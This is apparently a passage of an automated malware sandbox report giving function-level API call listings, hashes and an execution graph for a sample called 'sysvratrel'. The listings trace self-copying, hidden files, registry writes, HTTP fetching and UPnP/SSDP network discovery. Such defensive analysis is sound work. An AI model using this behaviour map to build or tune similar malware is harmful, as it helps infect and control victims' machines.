                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFreeInstanceString
                                                                          • String ID: Microsoft Corporation
                                                                          • API String ID: 586785272-3838278685
                                                                          • Opcode ID: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
                                                                          • Instruction ID: b15f4297b17ed5f57f8313cde646c824d4e9e4ad422ceb8e026561d0ece074f1
                                                                          • Opcode Fuzzy Hash: e7592a1b6a7ca93a492843d129d0f5c494d0862bf32e99145538b4b10712f6f9
                                                                          • Instruction Fuzzy Hash: 9591FD75A0450ADFCB04DF94C894AAFB3B5BF49304F208169E515BB3E4D734AD42CBA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040DE00: memset.NTDLL ref: 0040DE28
                                                                            • Part of subcall function 0040DE00: InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
                                                                            • Part of subcall function 0040DE00: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
                                                                            • Part of subcall function 0040DE00: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
                                                                            • Part of subcall function 0040DE00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
                                                                            • Part of subcall function 0040DE00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
                                                                            • Part of subcall function 0040DE00: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
                                                                            • Part of subcall function 0040DE00: InternetCloseHandle.WININET(00000000), ref: 0040DFF7
                                                                            • Part of subcall function 0040DCF0: SysAllocString.OLEAUT32(00000000), ref: 0040DD1E
                                                                            • Part of subcall function 0040DCF0: CoCreateInstance.OLE32(00412738,00000000,00004401,00412728,00000000), ref: 0040DD46
                                                                            • Part of subcall function 0040DCF0: SysFreeString.OLEAUT32(00000000), ref: 0040DDE1
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040DCA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                          • String ID: %S%S
                                                                          • API String ID: 1017111014-3267608656
                                                                          • Opcode ID: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
                                                                          • Instruction ID: 028390a8fa3b683b7bf8b6e952c0b4b0066608931571745b54bc663e5df7610f
                                                                          • Opcode Fuzzy Hash: e90815c1511221caa1bb4232c4d734c08bee98e5bb0896a31ce96f10b80c8380
                                                                          • Instruction Fuzzy Hash: 4C415BB5E002099FDB04DBE4C885AEFB7B5BF48304F104529E605B7390D778AA45CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407C61), ref: 0040D88A
                                                                            • Part of subcall function 0040D950: socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
                                                                            • Part of subcall function 0040D950: htons.WS2_32(0000076C), ref: 0040D9A0
                                                                            • Part of subcall function 0040D950: inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
                                                                            • Part of subcall function 0040D950: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
                                                                            • Part of subcall function 0040D950: bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
                                                                            • Part of subcall function 0040D950: lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
                                                                            • Part of subcall function 0040D950: sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
                                                                            • Part of subcall function 0040D950: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45
                                                                            • Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DC9B
                                                                            • Part of subcall function 0040DBC0: SysFreeString.OLEAUT32(00000000), ref: 0040DCA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                          • String ID: TCP$UDP
                                                                          • API String ID: 1519345861-1097902612
                                                                          • Opcode ID: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
                                                                          • Instruction ID: adc5519654865a9846dc14ee6574ade53ee5e8f68d7e54780b62f97b8647e200
                                                                          • Opcode Fuzzy Hash: 23e2b161602aa368edb7d0b330d9f7272b4556a0a3daad279aa881e4cc12a6d8
                                                                          • Instruction Fuzzy Hash: FE11AFB5E04208EBDB00EFD5EC45BAE7778EB44308F1088AAE510772C2E6785A54CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00416C40,?,?,?), ref: 00405E5F
                                                                          • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                          • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                          • LeaveCriticalSection.KERNEL32(00416C40), ref: 00405F30
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionmemcpy$EnterLeave
                                                                          • String ID:
                                                                          • API String ID: 469056452-0
                                                                          • Opcode ID: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
                                                                          • Instruction ID: d4c7a0d735d14698d69a5203b24d712139acd761569c954f121491256ddf65dc
                                                                          • Opcode Fuzzy Hash: 11253c93557e272cfa09b9ef5557470c866ee47475f0489080f61b160b652d5f
                                                                          • Instruction Fuzzy Hash: B8216B70A04208ABCB05DB94D885BDFB772EB44304F1481BAE84667281D67DAA85CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:0.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:1447
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 5350 40d140 5356 4021b0 5350->5356 5353 40d17f 5354 40d165 WaitForSingleObject 5360 401600 5354->5360 5357 4021bb 5356->5357 5358 4021cf 5356->5358 5357->5358 5381 402020 5357->5381 5358->5353 5358->5354 5361 401737 5360->5361 5362 40160d 5360->5362 5361->5353 5362->5361 5363 401619 EnterCriticalSection 5362->5363 5364 401630 5363->5364 5365 4016b5 LeaveCriticalSection SetEvent 5363->5365 5364->5365 5369 401641 InterlockedDecrement 5364->5369 5372 40165a InterlockedExchangeAdd 5364->5372 5379 4016a0 InterlockedDecrement 5364->5379 5366 4016d0 5365->5366 5367 4016e8 5365->5367 5370 4016d6 PostQueuedCompletionStatus 5366->5370 5368 40d510 11 API calls 5367->5368 5371 4016f3 5368->5371 5369->5364 5370->5367 5370->5370 5373 40d650 7 API calls 5371->5373 5372->5364 5374 40166d InterlockedIncrement 5372->5374 5375 4016fc CloseHandle CloseHandle WSACloseEvent 5373->5375 5402 401c50 WSARecv 5374->5402 5408 40ad80 shutdown closesocket 5375->5408 5378 401724 DeleteCriticalSection 5380 40a3f0 __aligned_recalloc_base 3 API calls 5378->5380 5379->5364 5380->5361 5382 409fd0 7 API calls 5381->5382 5383 40202b 5382->5383 5384 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5383->5384 5390 4021a5 5383->5390 5385 402076 CreateIoCompletionPort 5384->5385 5386 40219f 5384->5386 5385->5386 5387 40208f 5385->5387 5388 401600 36 API calls 5386->5388 5389 40d370 8 API calls 5387->5389 5388->5390 5391 402094 5389->5391 5390->5358 5391->5386 5392 40209f WSASocketA 5391->5392 5392->5386 5393 4020bd setsockopt htons bind 5392->5393 5393->5386 5394 402126 listen 5393->5394 5394->5386 5395 40213a WSACreateEvent 5394->5395 5395->5386 5396 402147 WSAEventSelect 5395->5396 5396->5386 5400 402159 5396->5400 5397 40217f 5399 40d3a0 17 API calls 5397->5399 5398 40d3a0 17 API calls 5398->5400 5401 402194 5399->5401 5400->5397 5400->5398 5401->5358 5403 401cd2 5402->5403 5404 401c8e 5402->5404 5403->5364 5405 401c90 WSAGetLastError 5404->5405 5406 401ca4 Sleep WSARecv 5404->5406 5407 401cdb 5404->5407 5405->5403 5405->5404 5406->5403 5406->5405 5407->5364 5408->5378 5409 4074c1 ExitThread 5728 406b86 5729 406b68 5728->5729 5730 406ca8 Sleep 5729->5730 5731 406b99 5729->5731 5733 406cb8 ExitThread 5729->5733 5736 406340 4 API calls 5729->5736 5730->5729 5732 406260 4 API calls 5731->5732 5735 406baa 5732->5735 5734 406bd0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5738 406c46 wsprintfW 5734->5738 5739 406c5b wsprintfW 5734->5739 5735->5734 5737 406bcb 5735->5737 5736->5729 5738->5739 5740 406650 49 API calls 5739->5740 5740->5737 5741 407d89 5742 407d92 5741->5742 5743 407da1 34 API calls 5742->5743 5744 408bd6 5742->5744 5436 40a4ce 5437 40a3f0 __aligned_recalloc_base 3 API calls 5436->5437 5438 40a48d 5437->5438 5439 40a4a2 5438->5439 5440 40a1e0 __aligned_recalloc_base 7 API calls 5438->5440 5441 40a4a4 memcpy 5438->5441 5440->5438 5441->5438 4353 4074d0 Sleep CreateMutexA GetLastError 4354 407506 ExitProcess 4353->4354 4355 40750e 6 API calls 4353->4355 4356 4075b3 4355->4356 4357 40773a Sleep RegOpenKeyExW 4355->4357 4412 40e970 GetLocaleInfoA strcmp 4356->4412 4358 407793 RegOpenKeyExW 4357->4358 4359 407767 RegSetValueExA RegCloseKey 4357->4359 4361 4077b5 RegSetValueExA RegCloseKey 4358->4361 4362 4077e6 RegOpenKeyExW 4358->4362 4359->4358 4364 4078e2 RegOpenKeyExW 4361->4364 4365 407808 RegCreateKeyExW RegCloseKey 4362->4365 4366 40783d RegOpenKeyExW 4362->4366 4369 407930 RegOpenKeyExW 4364->4369 4370 407904 RegSetValueExA RegCloseKey 4364->4370 4365->4366 4373 407894 RegOpenKeyExW 4366->4373 4374 40785f RegCreateKeyExW RegCloseKey 4366->4374 4367 4075c0 ExitProcess 4368 4075c8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4371 407687 Sleep wsprintfW CopyFileW 4368->4371 4372 407618 SetFileAttributesW RegOpenKeyExW 4368->4372 4376 407952 RegSetValueExA RegCloseKey 4369->4376 4377 40797e RegOpenKeyExA 4369->4377 4370->4369 4371->4357 4378 4076cb SetFileAttributesW RegOpenKeyExW 4371->4378 4372->4371 4375 407649 wcslen RegSetValueExW RegCloseKey 4372->4375 4373->4364 4379 4078b6 RegSetValueExA RegCloseKey 4373->4379 4374->4373 4375->4371 4376->4377 4380 4079a4 8 API calls 4377->4380 4381 407a8a RegOpenKeyExA 4377->4381 4378->4357 4382 4076fc wcslen RegSetValueExW RegCloseKey 4378->4382 4379->4364 4380->4381 4383 407ab0 8 API calls 4381->4383 4384 407b96 Sleep 4381->4384 4382->4357 4383->4384 4414 40ca10 4384->4414 4387 407bb1 9 API calls 4417 405b60 InitializeCriticalSection CreateFileW 4387->4417 5245 405820 4387->5245 5254 406b30 Sleep GetModuleFileNameW 4387->5254 5268 407380 4387->5268 4389 407d1d 4394 407c66 CreateEventA 4449 40c140 4394->4449 4403 40d3a0 17 API calls 4404 407cc6 4403->4404 4405 40d3a0 17 API calls 4404->4405 4406 407ce2 4405->4406 4407 40d3a0 17 API calls 4406->4407 4408 407cfd 4407->4408 4494 40d510 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4408->4494 4410 407d0e 4503 40d650 4410->4503 4413 4075b8 4412->4413 4413->4367 4413->4368 4512 40c9e0 4414->4512 4418 405c85 4417->4418 4419 405b98 CreateFileMappingW 4417->4419 4431 40d880 CoInitializeEx 4418->4431 4420 405bb9 MapViewOfFile 4419->4420 4421 405c7b CloseHandle 4419->4421 4422 405c71 CloseHandle 4420->4422 4423 405bd8 GetFileSize 4420->4423 4421->4418 4422->4421 4427 405bed 4423->4427 4424 405c67 UnmapViewOfFile 4424->4422 4425 405bfc 4425->4424 4427->4424 4427->4425 4428 405c2c 4427->4428 4641 40ca60 4427->4641 4648 405c90 4427->4648 4429 40a3f0 __aligned_recalloc_base 3 API calls 4428->4429 4429->4425 4959 40d950 socket 4431->4959 4433 407c61 4444 406f50 CoInitializeEx SysAllocString 4433->4444 4436 40d8a0 4436->4433 4437 40d8ea 4436->4437 4443 40d928 4436->4443 4969 40dbc0 4436->4969 4984 40acc0 htons 4437->4984 4442 40e6b0 24 API calls 4442->4443 5003 40a510 4443->5003 4445 406f72 4444->4445 4446 406f88 CoUninitialize 4444->4446 5148 406fa0 4445->5148 4446->4394 5157 40c100 4449->5157 4452 40c100 3 API calls 4453 40c15e 4452->4453 4454 40c100 3 API calls 4453->4454 4455 40c16e 4454->4455 4456 40c100 3 API calls 4455->4456 4457 407c7e 4456->4457 4458 40d370 4457->4458 4459 409fd0 7 API calls 4458->4459 4460 40d37b 4459->4460 4461 407c88 4460->4461 4462 40d387 InitializeCriticalSection 4460->4462 4463 40b500 InitializeCriticalSection 4461->4463 4462->4461 4468 40b51a 4463->4468 4464 40b549 CreateFileW 4466 40b570 CreateFileMappingW 4464->4466 4467 40b632 4464->4467 4470 40b591 MapViewOfFile 4466->4470 4471 40b628 CloseHandle 4466->4471 5213 40ada0 EnterCriticalSection 4467->5213 4468->4464 5164 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 4468->5164 5165 40b0e0 4468->5165 4474 40b5ac GetFileSize 4470->4474 4475 40b61e CloseHandle 4470->4475 4471->4467 4473 40b637 4476 40d3a0 17 API calls 4473->4476 4480 40b5cb 4474->4480 4475->4471 4477 407c92 4476->4477 4482 40d3a0 4477->4482 4478 40b614 UnmapViewOfFile 4478->4475 4480->4478 4481 40b0e0 32 API calls 4480->4481 5212 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 4480->5212 4481->4480 4483 40d3b7 EnterCriticalSection 4482->4483 4484 407caa 4482->4484 5240 40d490 4483->5240 4484->4403 4487 40d47b LeaveCriticalSection 4487->4484 4488 40a220 9 API calls 4489 40d3f9 4488->4489 4489->4487 4490 40d40b CreateThread 4489->4490 4490->4487 4491 40d42e 4490->4491 4492 40d452 GetCurrentProcess GetCurrentProcess DuplicateHandle 4491->4492 4493 40d474 4491->4493 4492->4493 4493->4487 4495 40d546 InterlockedExchangeAdd 4494->4495 4496 40d629 GetCurrentThread SetThreadPriority 4494->4496 4495->4496 4499 40d560 4495->4499 4496->4410 4497 40d579 EnterCriticalSection 4497->4499 4498 40d5e7 LeaveCriticalSection 4498->4499 4501 40d5fe 4498->4501 4499->4496 4499->4497 4499->4498 4500 40d5c3 WaitForSingleObject 4499->4500 4499->4501 4502 40d61c Sleep 4499->4502 4500->4499 4501->4496 4502->4499 4504 40d6d2 4503->4504 4505 40d65c EnterCriticalSection 4503->4505 4504->4389 4506 40d678 4505->4506 4507 40d6a0 LeaveCriticalSection DeleteCriticalSection 4506->4507 4508 40d68b CloseHandle 4506->4508 4509 40a3f0 __aligned_recalloc_base 3 API calls 4507->4509 4508->4506 4510 40d6c6 4509->4510 4511 40a3f0 __aligned_recalloc_base 3 API calls 4510->4511 4511->4504 4515 40c630 4512->4515 4516 40c64e 4515->4516 4519 40c663 4515->4519 4521 40c690 4516->4521 4518 407ba6 4518->4387 4518->4389 4519->4518 4547 40c810 4519->4547 4522 40c742 4521->4522 4523 40c6b9 4521->4523 4525 409fd0 7 API calls 4522->4525 4546 40c73a 4522->4546 4523->4546 4581 409fd0 4523->4581 4527 40c768 4525->4527 4530 402420 7 API calls 4527->4530 4527->4546 4531 40c795 4530->4531 4533 4024e0 10 API calls 4531->4533 4535 40c7af 4533->4535 4534 40c70f 4536 402420 7 API calls 4534->4536 4537 402420 7 API calls 4535->4537 4538 40c720 4536->4538 4539 40c7c0 4537->4539 4540 4024e0 10 API calls 4538->4540 4541 4024e0 10 API calls 4539->4541 4540->4546 4542 40c7da 4541->4542 4543 402420 7 API calls 4542->4543 4544 40c7eb 4543->4544 4545 4024e0 10 API calls 4544->4545 4545->4546 4546->4518 4548 40c839 4547->4548 4549 40c8ea 4547->4549 4550 409fd0 7 API calls 4548->4550 4580 40c8e2 4548->4580 4551 409fd0 7 API calls 4549->4551 4549->4580 4552 40c84f 4550->4552 4553 40c90e 4551->4553 4554 402420 7 API calls 4552->4554 4552->4580 4556 402420 7 API calls 4553->4556 4553->4580 4555 40c873 4554->4555 4557 409fd0 7 API calls 4555->4557 4558 40c932 4556->4558 4559 40c882 4557->4559 4560 409fd0 7 API calls 4558->4560 4561 4024e0 10 API calls 4559->4561 4562 40c941 4560->4562 4563 40c8ab 4561->4563 4564 4024e0 10 API calls 4562->4564 4565 40a3f0 __aligned_recalloc_base 3 API calls 4563->4565 4566 40c96a 4564->4566 4567 40c8b7 4565->4567 4568 40a3f0 __aligned_recalloc_base 3 API calls 4566->4568 4569 402420 7 API calls 4567->4569 4570 40c976 4568->4570 4571 40c8c8 4569->4571 4572 402420 7 API calls 4570->4572 4573 4024e0 10 API calls 4571->4573 4574 40c987 4572->4574 4573->4580 4575 4024e0 10 API calls 4574->4575 4576 40c9a1 4575->4576 4577 402420 7 API calls 4576->4577 4578 40c9b2 4577->4578 4579 4024e0 10 API calls 4578->4579 4579->4580 4580->4518 4592 409ff0 4581->4592 4584 402420 4613 40a1e0 4584->4613 4589 4024e0 4620 402540 4589->4620 4591 4024ff __aligned_recalloc_base 4591->4534 4601 40a090 GetCurrentProcessId 4592->4601 4594 409ffb 4595 40a007 __aligned_recalloc_base 4594->4595 4602 40a0b0 4594->4602 4597 409fde 4595->4597 4598 40a022 HeapAlloc 4595->4598 4597->4546 4597->4584 4598->4597 4599 40a049 __aligned_recalloc_base 4598->4599 4599->4597 4600 40a064 memset 4599->4600 4600->4597 4601->4594 4610 40a090 GetCurrentProcessId 4602->4610 4604 40a0b9 4605 40a0d6 HeapCreate 4604->4605 4611 40a120 GetProcessHeaps 4604->4611 4607 40a0f0 HeapSetInformation GetCurrentProcessId 4605->4607 4608 40a117 4605->4608 4607->4608 4608->4595 4610->4604 4612 40a0cc 4611->4612 4612->4605 4612->4608 4614 409ff0 __aligned_recalloc_base 7 API calls 4613->4614 4615 40242b 4614->4615 4616 402820 4615->4616 4617 40282a 4616->4617 4618 40a1e0 __aligned_recalloc_base 7 API calls 4617->4618 4619 402438 4618->4619 4619->4589 4621 40258e 4620->4621 4622 402551 4620->4622 4621->4622 4623 40a1e0 __aligned_recalloc_base 7 API calls 4621->4623 4622->4591 4626 4025b2 _invalid_parameter 4623->4626 4624 4025e2 memcpy 4625 402606 _invalid_parameter 4624->4625 4627 40a3f0 __aligned_recalloc_base 3 API calls 4625->4627 4626->4624 4630 40a3f0 4626->4630 4627->4622 4637 40a090 GetCurrentProcessId 4630->4637 4632 40a3fb 4633 4025df 4632->4633 4638 40a330 4632->4638 4633->4624 4636 40a417 HeapFree 4636->4633 4637->4632 4639 40a360 HeapValidate 4638->4639 4640 40a380 4638->4640 4639->4640 4640->4633 4640->4636 4658 40a460 4641->4658 4646 40a3f0 __aligned_recalloc_base 3 API calls 4647 40caa1 4646->4647 4647->4427 4871 40a220 4648->4871 4651 405cca memcpy 4653 40a460 8 API calls 4651->4653 4652 405d88 4652->4427 4654 405d01 4653->4654 4881 40c3d0 4654->4881 4662 40a48d 4658->4662 4659 40a1e0 __aligned_recalloc_base 7 API calls 4659->4662 4660 40a4a2 4660->4647 4663 40bf70 4660->4663 4661 40a4a4 memcpy 4661->4662 4662->4659 4662->4660 4662->4661 4671 40bf7a 4663->4671 4665 40bf99 4665->4646 4665->4647 4667 40bfb1 memcmp 4667->4671 4668 40bfd8 4669 40a3f0 __aligned_recalloc_base 3 API calls 4668->4669 4669->4665 4670 40a3f0 __aligned_recalloc_base 3 API calls 4670->4671 4671->4665 4671->4667 4671->4668 4671->4670 4672 40c460 4671->4672 4686 407d30 4671->4686 4673 40c46f __aligned_recalloc_base 4672->4673 4674 40a1e0 __aligned_recalloc_base 7 API calls 4673->4674 4676 40c479 4673->4676 4675 40c508 4674->4675 4675->4676 4677 402420 7 API calls 4675->4677 4676->4671 4678 40c51d 4677->4678 4679 402420 7 API calls 4678->4679 4680 40c525 4679->4680 4682 40c57d __aligned_recalloc_base 4680->4682 4689 40c5d0 4680->4689 4694 402470 4682->4694 4685 402470 3 API calls 4685->4676 4802 409f50 4686->4802 4690 4024e0 10 API calls 4689->4690 4691 40c5e4 4690->4691 4700 4026f0 4691->4700 4693 40c5fc 4693->4680 4695 4024ce 4694->4695 4698 402484 _invalid_parameter 4694->4698 4695->4685 4696 4024ac 4697 40a3f0 __aligned_recalloc_base 3 API calls 4696->4697 4697->4695 4698->4696 4699 40a3f0 __aligned_recalloc_base 3 API calls 4698->4699 4699->4696 4703 402710 4700->4703 4702 40270a 4702->4693 4704 402724 4703->4704 4705 402540 __aligned_recalloc_base 10 API calls 4704->4705 4706 40276d 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40277d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40278d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40279d 4711->4712 4713 4027a6 4712->4713 4714 4027cf 4712->4714 4718 403e20 4713->4718 4735 403df0 4714->4735 4717 4027c7 __aligned_recalloc_base 4717->4702 4719 402820 _invalid_parameter 7 API calls 4718->4719 4720 403e37 4719->4720 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e46 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e55 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4734 403e64 _invalid_parameter __aligned_recalloc_base 4725->4734 4727 40400f _invalid_parameter 4728 402850 _invalid_parameter 3 API calls 4727->4728 4729 404035 _invalid_parameter 4727->4729 4728->4727 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 40405b _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404081 4731->4733 4732->4731 4733->4717 4734->4727 4738 402850 4734->4738 4742 404090 4735->4742 4737 403e0c 4737->4717 4739 40285b 4738->4739 4741 402866 4738->4741 4740 40a3f0 __aligned_recalloc_base 3 API calls 4739->4740 4740->4741 4741->4734 4743 4040a6 _invalid_parameter 4742->4743 4744 4040b8 _invalid_parameter 4743->4744 4745 4040dd 4743->4745 4747 404103 4743->4747 4744->4737 4772 403ca0 4745->4772 4748 40413d 4747->4748 4749 40415e 4747->4749 4782 404680 4748->4782 4750 402820 _invalid_parameter 7 API calls 4749->4750 4752 40416f 4750->4752 4753 402820 _invalid_parameter 7 API calls 4752->4753 4754 40417e 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40418d 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40419c 4757->4758 4795 403d70 4758->4795 4760 402820 _invalid_parameter 7 API calls 4761 4041ca _invalid_parameter 4760->4761 4761->4760 4762 404284 _invalid_parameter __aligned_recalloc_base 4761->4762 4763 402850 _invalid_parameter 3 API calls 4762->4763 4764 4045a3 _invalid_parameter 4762->4764 4763->4762 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045c9 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045ef _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 404615 _invalid_parameter 4768->4770 4769->4768 4770->4744 4771 402850 _invalid_parameter 3 API calls 4770->4771 4771->4770 4773 403cae 4772->4773 4774 402820 _invalid_parameter 7 API calls 4773->4774 4775 403ccb 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4777 403cda _invalid_parameter 4776->4777 4778 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4777->4778 4779 403d3a _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d60 4779->4781 4780->4779 4781->4744 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 404697 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 4046a6 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4791 4046b5 _invalid_parameter __aligned_recalloc_base 4787->4791 4788 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4788->4791 4789 404841 _invalid_parameter 4790 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4789->4790 4792 404867 _invalid_parameter 4789->4792 4790->4789 4791->4788 4791->4789 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 40488d 4792->4794 4793->4792 4794->4744 4796 402820 _invalid_parameter 7 API calls 4795->4796 4797 403d7f _invalid_parameter 4796->4797 4798 403ca0 _invalid_parameter 9 API calls 4797->4798 4799 403db8 _invalid_parameter 4798->4799 4800 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4799->4800 4801 403de3 4799->4801 4800->4799 4801->4761 4803 409f62 4802->4803 4806 409eb0 4803->4806 4807 40a1e0 __aligned_recalloc_base 7 API calls 4806->4807 4809 409ec0 4807->4809 4812 407d4f 4809->4812 4813 409efc 4809->4813 4815 4093e0 4809->4815 4822 4099d0 4809->4822 4827 409da0 4809->4827 4811 40a3f0 __aligned_recalloc_base 3 API calls 4811->4812 4812->4671 4813->4811 4816 4093f3 4815->4816 4821 4093e9 4815->4821 4817 409436 memset 4816->4817 4816->4821 4818 409457 4817->4818 4817->4821 4819 40945d memcpy 4818->4819 4818->4821 4835 4091b0 4819->4835 4821->4809 4823 4099dd 4822->4823 4824 4099e7 4822->4824 4823->4809 4824->4823 4825 409adf memcpy 4824->4825 4840 409700 4824->4840 4825->4824 4828 409db6 4827->4828 4833 409dac 4827->4833 4829 409700 64 API calls 4828->4829 4828->4833 4830 409e37 4829->4830 4831 4091b0 6 API calls 4830->4831 4830->4833 4832 409e56 4831->4832 4832->4833 4834 409e6b memcpy 4832->4834 4833->4809 4834->4833 4836 4091fe 4835->4836 4837 4091be 4835->4837 4836->4821 4837->4836 4839 4090f0 6 API calls 4837->4839 4839->4837 4841 409710 4840->4841 4842 40971a 4840->4842 4841->4824 4842->4841 4850 409540 4842->4850 4845 409858 memcpy 4845->4841 4847 409877 memcpy 4848 4099a1 4847->4848 4849 409700 62 API calls 4848->4849 4849->4841 4851 409557 4850->4851 4858 40954d 4850->4858 4853 4095e5 4851->4853 4854 4095c8 4851->4854 4851->4858 4860 4095e0 4851->4860 4857 4091b0 6 API calls 4853->4857 4856 4091b0 6 API calls 4854->4856 4856->4860 4857->4860 4858->4841 4858->4845 4858->4847 4859 40968c memset 4859->4858 4861 408ea0 4860->4861 4862 408eb9 4861->4862 4870 408eaf 4861->4870 4863 408d70 9 API calls 4862->4863 4862->4870 4864 408fb2 4863->4864 4865 40a1e0 __aligned_recalloc_base 7 API calls 4864->4865 4866 409001 4865->4866 4867 408be0 46 API calls 4866->4867 4866->4870 4868 40902e 4867->4868 4869 40a3f0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4868->4869 4869->4870 4870->4858 4870->4859 4890 40a090 GetCurrentProcessId 4871->4890 4873 40a22b 4874 40a0b0 __aligned_recalloc_base 5 API calls 4873->4874 4878 40a237 __aligned_recalloc_base 4873->4878 